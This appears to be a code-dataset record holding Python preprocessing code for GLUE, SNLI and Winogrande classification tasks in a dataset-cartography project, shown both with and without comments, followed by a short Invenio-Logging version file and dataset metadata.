and by ``0`` for padded values. If set to ``False``, inverts it (``1`` for padded values, ``0`` for
actual values)
Returns:
If the ``examples`` input is a ``tf.data.Dataset``, will return a ``tf.data.Dataset``
containing the task-specific features. If the input is a list of ``InputExamples``, will return
a list of task-specific ``InputFeatures`` which can be fed to the model.
"""
is_tf_dataset = False
if is_tf_available() and isinstance(examples, tf.data.Dataset):
is_tf_dataset = True
if task is not None:
processor = glue_processors[task]()
if label_list is None:
label_list = processor.get_labels()
logger.info("Using label list %s for task %s" % (label_list, task))
if output_mode is None:
output_mode = glue_output_modes[task]
logger.info("Using output mode %s for task %s" % (output_mode, task))
label_map = {label: i for i, label in enumerate(label_list)}
features = []
lex = []
const= []
subs = []
if heuristics==True:
lex, const, subs = get_instance_heuristics(task, data_split)
for (ex_index, example) in enumerate(examples):
len_examples = 0
if is_tf_dataset:
example = processor.get_example_from_tensor_dict(example)
example = processor.tfds_map(example)
len_examples = tf.data.experimental.cardinality(examples)
else:
len_examples = len(examples)
if ex_index % 10000 == 0:
logger.info("Writing example %d/%d" % (ex_index, len_examples))
inputs = tokenizer.encode_plus(example.text_a, example.text_b, add_special_tokens=True, max_length=max_length,)
input_ids, token_type_ids = inputs["input_ids"], inputs["token_type_ids"]
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
attention_mask = [1 if mask_padding_with_zero else 0] * len(input_ids)
# Zero-pad up to the sequence length.
padding_length = max_length - len(input_ids)
if pad_on_left:
input_ids = ([pad_token] * padding_length) + input_ids
attention_mask = ([0 if mask_padding_with_zero else 1] * padding_length) + attention_mask
token_type_ids = ([pad_token_segment_id] * padding_length) + token_type_ids
else:
input_ids = input_ids + ([pad_token] * padding_length)
attention_mask = attention_mask + ([0 if mask_padding_with_zero else 1] * padding_length)
token_type_ids = token_type_ids + ([pad_token_segment_id] * padding_length)
assert len(input_ids) == max_length, "Error with input length {} vs {}".format(len(input_ids), max_length)
assert len(attention_mask) == max_length, "Error with input length {} vs {}".format(
len(attention_mask), max_length
)
assert len(token_type_ids) == max_length, "Error with input length {} vs {}".format(
len(token_type_ids), max_length
)
if output_mode == "classification":
label = label_map[example.label]
elif output_mode == "regression":
label = float(example.label)
else:
raise KeyError(output_mode)
example_int_id = convert_string_to_unique_number(example.guid)
if ex_index < 5:
logger.info("*** Example ***")
logger.info(f"guid: {example_int_id}")
logger.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
logger.info("attention_mask: %s" % " ".join([str(x) for x in attention_mask]))
logger.info("token_type_ids: %s" % " ".join([str(x) for x in token_type_ids]))
logger.info("label: %s (id = %d)" % (example.label, label))
features.append(
AdaptedInputFeatures(input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
label=label,
example_id=example_int_id,
lex=None if len(lex)==0 else lex[ex_index],
const=None if len(const)==0 else const[ex_index],
subs=None if len(const)==0else subs[ex_index],
original_idx=ex_index))
if is_tf_available() and is_tf_dataset:
def gen():
for ex in features:
yield (
{
"input_ids": ex.input_ids,
"attention_mask": ex.attention_mask,
"token_type_ids": ex.token_type_ids,
},
ex.label,
)
return tf.data.Dataset.from_generator(
gen,
({"input_ids": tf.int32, "attention_mask": tf.int32, "token_type_ids": tf.int32}, tf.int64),
(
{
"input_ids": tf.TensorShape([None]),
"attention_mask": tf.TensorShape([None]),
"token_type_ids": tf.TensorShape([None]),
},
tf.TensorShape([]),
),
)
return features
def adapted_glue_compute_metrics(task_name, preds, labels):
"Adapted from `glue_compute_metrics` to also handle SNLI."
try:
return glue_compute_metrics(task_name, preds, labels)
except KeyError:
if task_name in ["snli", "winogrande", "toxic"]:
# Since MNLI also uses accuracy.
return glue_compute_metrics("mnli", preds, labels)
raise KeyError(task_name)
| 41.478814 | 130 | 0.647053 | import logging
import os
from transformers import glue_compute_metrics
from transformers import glue_convert_examples_to_features as convert_examples_to_features
from transformers import glue_output_modes
from transformers import glue_processors
from transformers.data.processors.glue import MnliMismatchedProcessor
from transformers.data.processors.utils import InputFeatures
from transformers.file_utils import is_tf_available
if is_tf_available():
import tensorflow as tf
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s", level=logging.INFO
)
logger = logging.getLogger(__name__)
from cartography.data_utils_glue import convert_string_to_unique_number
from cartography.classification.mnli_utils import AdaptedMnliMismatchedProcessor, AdaptedMnliProcessor
from cartography.classification.qnli_utils import AdaptedQnliProcessor
from cartography.classification.snli_utils import SNLIProcessor
from cartography.classification.winogrande_utils import WinograndeProcessor
from cartography.classification.wnli_utils import AdaptedWnliProcessor
from cartography.classification.rte_utils import AdaptedRteProcessor
import pandas as pd
glue_processors["snli"] = SNLIProcessor
glue_processors["mnli"] = AdaptedMnliProcessor
glue_processors["mnli-mm"] = AdaptedMnliMismatchedProcessor
glue_processors["qnli"] = AdaptedQnliProcessor
glue_processors["winogrande"] = WinograndeProcessor
glue_processors["wnli"] = AdaptedWnliProcessor
glue_processors["rte"] = AdaptedRteProcessor
glue_output_modes["snli"] = "classification"
glue_output_modes["winogrande"] = "classification"
class AdaptedInputFeatures(InputFeatures):
def __init__(self, input_ids, attention_mask=None, token_type_ids=None, label=None, example_id=None, lex = None,
const=None, subs=None, original_idx=None):
self.input_ids = input_ids
self.attention_mask = attention_mask
self.token_type_ids = token_type_ids
self.label = label
self.example_id = example_id
self.lex = lex
self.const = const
self.subs = subs
self.original_idx = original_idx
def get_instance_heuristics(task, data_split):
mode = data_split
= 'dev'
if task.upper() == 'MNLI':
mode = 'dev_matched'
df = pd.read_csv("/home/jusun/adila001/{}/{}_heuristic.tsv".format(task.upper(), mode), delimiter="\t|\n")
lexical = df["lexical"].tolist()
if 'constituent' in set(df.columns):
constituent = df["constituent"].tolist()
else:
constituent = [0 for i in range(df.shape[0])]
subsequence = df["subsequence"].tolist()
return lexical, constituent, subsequence
def adapted_glue_convert_examples_to_features(
examples,
tokenizer,
max_length=512,
task=None,
label_list=None,
output_mode=None,
pad_on_left=False,
pad_token=0,
pad_token_segment_id=0,
mask_padding_with_zero=True,
heuristics=True,
data_split='train',
):
is_tf_dataset = False
if is_tf_available() and isinstance(examples, tf.data.Dataset):
is_tf_dataset = True
if task is not None:
processor = glue_processors[task]()
if label_list is None:
label_list = processor.get_labels()
logger.info("Using label list %s for task %s" % (label_list, task))
if output_mode is None:
output_mode = glue_output_modes[task]
logger.info("Using output mode %s for task %s" % (output_mode, task))
label_map = {label: i for i, label in enumerate(label_list)}
features = []
lex = []
const= []
subs = []
if heuristics==True:
lex, const, subs = get_instance_heuristics(task, data_split)
for (ex_index, example) in enumerate(examples):
len_examples = 0
if is_tf_dataset:
example = processor.get_example_from_tensor_dict(example)
example = processor.tfds_map(example)
len_examples = tf.data.experimental.cardinality(examples)
else:
len_examples = len(examples)
if ex_index % 10000 == 0:
logger.info("Writing example %d/%d" % (ex_index, len_examples))
inputs = tokenizer.encode_plus(example.text_a, example.text_b, add_special_tokens=True, max_length=max_length,)
input_ids, token_type_ids = inputs["input_ids"], inputs["token_type_ids"]
attention_mask = [1 if mask_padding_with_zero else 0] * len(input_ids)
padding_length = max_length - len(input_ids)
if pad_on_left:
input_ids = ([pad_token] * padding_length) + input_ids
attention_mask = ([0 if mask_padding_with_zero else 1] * padding_length) + attention_mask
token_type_ids = ([pad_token_segment_id] * padding_length) + token_type_ids
else:
input_ids = input_ids + ([pad_token] * padding_length)
attention_mask = attention_mask + ([0 if mask_padding_with_zero else 1] * padding_length)
token_type_ids = token_type_ids + ([pad_token_segment_id] * padding_length)
assert len(input_ids) == max_length, "Error with input length {} vs {}".format(len(input_ids), max_length)
assert len(attention_mask) == max_length, "Error with input length {} vs {}".format(
len(attention_mask), max_length
)
assert len(token_type_ids) == max_length, "Error with input length {} vs {}".format(
len(token_type_ids), max_length
)
if output_mode == "classification":
label = label_map[example.label]
elif output_mode == "regression":
label = float(example.label)
else:
raise KeyError(output_mode)
example_int_id = convert_string_to_unique_number(example.guid)
if ex_index < 5:
logger.info("*** Example ***")
logger.info(f"guid: {example_int_id}")
logger.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
logger.info("attention_mask: %s" % " ".join([str(x) for x in attention_mask]))
logger.info("token_type_ids: %s" % " ".join([str(x) for x in token_type_ids]))
logger.info("label: %s (id = %d)" % (example.label, label))
features.append(
AdaptedInputFeatures(input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
label=label,
example_id=example_int_id,
lex=None if len(lex)==0 else lex[ex_index],
const=None if len(const)==0 else const[ex_index],
subs=None if len(const)==0else subs[ex_index],
original_idx=ex_index))
if is_tf_available() and is_tf_dataset:
def gen():
for ex in features:
yield (
{
"input_ids": ex.input_ids,
"attention_mask": ex.attention_mask,
"token_type_ids": ex.token_type_ids,
},
ex.label,
)
return tf.data.Dataset.from_generator(
gen,
({"input_ids": tf.int32, "attention_mask": tf.int32, "token_type_ids": tf.int32}, tf.int64),
(
{
"input_ids": tf.TensorShape([None]),
"attention_mask": tf.TensorShape([None]),
"token_type_ids": tf.TensorShape([None]),
},
tf.TensorShape([]),
),
)
return features
def adapted_glue_compute_metrics(task_name, preds, labels):
try:
return glue_compute_metrics(task_name, preds, labels)
except KeyError:
if task_name in ["snli", "winogrande", "toxic"]:
return glue_compute_metrics("mnli", preds, labels)
raise KeyError(task_name)
| true | true |
f72ef9d32075ad3081247fcdbd108c4a87b8024a | 446 | py | Python | invenio_logging/version.py | kprzerwa/invenio-logging | 1eab0074eaf732f8bd303817e931fdf0c0a53b71 | [
"MIT"
] | null | null | null | invenio_logging/version.py | kprzerwa/invenio-logging | 1eab0074eaf732f8bd303817e931fdf0c0a53b71 | [
"MIT"
] | null | null | null | invenio_logging/version.py | kprzerwa/invenio-logging | 1eab0074eaf732f8bd303817e931fdf0c0a53b71 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2019 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Version information for Invenio-Logging.
This file is imported by ``invenio_logging.__init__``,
and parsed by ``setup.py``.
"""
from __future__ import absolute_import, print_function
__version__ = '1.2.0'
| 24.777778 | 72 | 0.726457 |
from __future__ import absolute_import, print_function
__version__ = '1.2.0'
| true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.